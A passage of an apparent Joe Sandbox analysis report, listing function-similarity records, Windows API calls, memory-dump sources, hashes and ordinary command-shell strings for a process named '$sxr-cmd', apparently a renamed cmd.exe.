                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1412018758-0
                                                                                                            • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                            • Instruction ID: b5b9a0c0e91dfb1e0db6e8d431797c243729f9133cb4160b088edab4304e2f78
                                                                                                            • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                            • Instruction Fuzzy Hash: 7CE0ED41F59A0795FFD47B6268C117492587F5E760F982430DD2D25382EE2DE0ADC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1357844191-0
                                                                                                            • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                            • Instruction ID: 83f3e8ccc5af8d59f5736d6db141a26db14aed6456b9678c0eae149276cac6c3
                                                                                                            • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                            • Instruction Fuzzy Hash: F7F03136A18A42C6EB84AB15F880478FBA4FB89B60B989534D94E27354DF3DD459CB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF7137E6F97), ref: 00007FF7137F550C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultLangUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 768647712-0
                                                                                                            • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                            • Instruction ID: 111fff8b74461db7647460406a80ecbfe752fc6d1c86022d92af90161a2634c1
                                                                                                            • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                            • Instruction Fuzzy Hash: B4E0C2A2D08A53CAF6D43B41E0C13B4995BEB6D7B2FC44031C61D232C0892D684D6228
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction ID: 1183d4c8e5f91b8d5b08d1752002abfefcdf8ca00ede9c09bf98eee4268f142c
                                                                                                            • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction Fuzzy Hash: 42F06DB4702E3CF8FF545B629459BD512825BEAB8AF8D84B06D0B963D1DBACC4498210
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: b3636270dc334481da2e70e1418cf83bfb8279ff22d86b5c5f9da6d6c2604517
                                                                                                            • Instruction ID: e4e055e86d0b3abcb4c9d6a8125e652f469975940fa147d48520d8cf319615ff
                                                                                                            • Opcode Fuzzy Hash: b3636270dc334481da2e70e1418cf83bfb8279ff22d86b5c5f9da6d6c2604517
                                                                                                            • Instruction Fuzzy Hash: 8BF0A730701E7CF6FE641B71681DFE921829BE67AAFC846A0BE27467C1DB2CC4898111
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction ID: 11f54a3354a1fa5c283f125ff392d847d506006def22c0e856dedc11eabc91ba
                                                                                                            • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction Fuzzy Hash: 51D0A9B0A02C68EAFE2897A2681DBF001939BF578EF8480A0BD0A82251AB1044990240
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: 0adb59561bc91aea81df1b12ca5df08c492be0d1d29f7ab664d8fc4c3399ffab
                                                                                                            • Instruction ID: 5095bfff5ab31eee1e04145088666890b91a178154ff0676ac7847600af877ef
                                                                                                            • Opcode Fuzzy Hash: 0adb59561bc91aea81df1b12ca5df08c492be0d1d29f7ab664d8fc4c3399ffab
                                                                                                            • Instruction Fuzzy Hash: F9D0C921A06B41C6EE85670594893B8A6A0BB49B05FD84534CA1D1A361DF7990AA8710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807F44
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF713807F5C
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807F9E
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807FFF
                                                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808020
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808036
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808061
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808075
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138080D6
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138080EA
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF713808177
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF71380819A
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF7138081BD
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF7138081DC
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF7138081FB
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF71380821A
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF713808239
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808291
                                                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138082D7
                                                                                                            • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138082FB
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71380831A
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808364
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808378
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71380839A
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138083AE
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138083E6
                                                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808403
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808418
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                            • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                            • API String ID: 3637805771-3100821235
                                                                                                            • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                            • Instruction ID: 1a640389fecd3ac39cdc59ca67237063212c6bda4adec4f6f3e4aac03c49bf42
                                                                                                            • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                            • Instruction Fuzzy Hash: 02E19331A14E52CAE790AF21E400179FAE1FB89BA4B859230CD1E67794DF7EA45CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                            • String ID: DPATH
                                                                                                            • API String ID: 95024817-2010427443
                                                                                                            • Opcode ID: 4eba62a14e43abc6af58f84d659d5bf88ed7609b6ae651bb9c78c46a9deec993
                                                                                                            • Instruction ID: 21ba95c4a299ed6acff317cb1e4ccdb7d1070e6236b727445d1336d03edfbab2
                                                                                                            • Opcode Fuzzy Hash: 4eba62a14e43abc6af58f84d659d5bf88ed7609b6ae651bb9c78c46a9deec993
                                                                                                            • Instruction Fuzzy Hash: D612C932A18E828AE7A0AF159440179FBE1FB89764F844235EA5E77794DF3DD41CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: [...]$ [..]$ [.]$...$:
                                                                                                            • API String ID: 0-1980097535
                                                                                                            • Opcode ID: d3563aa8005a2adb5706af48719c403af2b001f51d2085656c98ee63d3bc0941
                                                                                                            • Instruction ID: 05c867c37357364b347822227e01ba93656e3d872bedea15a09a0583c8c511ef
                                                                                                            • Opcode Fuzzy Hash: d3563aa8005a2adb5706af48719c403af2b001f51d2085656c98ee63d3bc0941
                                                                                                            • Instruction Fuzzy Hash: AB32C272A08F8286EBA0EF25D4402F9B3E4EB497A4F814131DA1D2B695DF7DE51DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                            • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                            • API String ID: 4111365348-3662956551
                                                                                                            • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                            • Instruction ID: 26f31adcbf2b61761f8b1ce6303299074f4f1c004ecb67005d5161881323714c
                                                                                                            • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                            • Instruction Fuzzy Hash: 1AE1B061A08E4286FB90AB64A8805B9E7A1FF887B4FD44132D90E77695DF3DE51CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _wcsupr.MSVCRT ref: 00007FF71380EF33
                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EF98
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFA9
                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFBF
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF71380EFDC
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFED
                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F003
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F022
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F083
                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F092
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F0A5
                                                                                                            • towupper.MSVCRT ref: 00007FF71380F0DB
                                                                                                            • wcschr.MSVCRT ref: 00007FF71380F135
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F16C
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F185
                                                                                                              • Part of subcall function 00007FF7137F01B8: _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
                                                                                                              • Part of subcall function 00007FF7137F01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                            • String ID: <noalias>$CMD.EXE
                                                                                                            • API String ID: 1161012917-1690691951
                                                                                                            • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                            • Instruction ID: 59a5d070a71c3f5a3f1a8fc5299afb0a8c5fa8ef5e0de52ca7ce586b32b4199e
                                                                                                            • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                            • Instruction Fuzzy Hash: 6291A122B08E428AFB95AB60E4400BDBAA0BF49B74F848135DD0E666D4DF3DA45DC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
